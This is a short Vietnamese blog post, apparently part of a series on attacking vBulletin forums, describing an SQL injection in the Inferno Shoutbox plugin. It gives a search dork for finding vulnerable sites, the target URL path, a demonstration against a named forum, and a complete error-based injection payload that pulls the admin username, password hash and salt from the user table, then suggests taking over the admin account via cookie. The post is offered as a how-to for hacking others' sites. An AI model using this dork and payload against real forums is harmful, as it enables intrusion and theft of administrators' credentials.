Thứ Ba, 8 tháng 1, 2013

Tiếp Tục Phần Khai Thác Vbulletin [sql trên shoutbox]

2 bài trứoc viết về vbb,tiếp tục mình viết nốt mấy bug còn lại ,bài này là lỗi sql trên shoutbox
dork khai thác :inurl:infernoshout.php
ra một số trang thêm vào đuôi victim tìm đc đoạn như sau
victim.com/folder/infernoshout.php?do=options&area=commands
Mình demo trên http://bien19.biz/forum/infernoshout.php?do=options&area=commands
hiện ra như sau

Như thấy nó hiện ra 4 khung,khung đầu nhập vào đoạn query là

' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#

Khung tiếp theo thích nhập gì thì nhập .

save setting,nó sẽ hiện ra trang thông báo


View source kéo xuống ta xem tên user và đoạn pass mã hóa nó,lấy đăng nhập bằng user admin bằng cookie thôi^^


Không có nhận xét nào:

Đăng nhận xét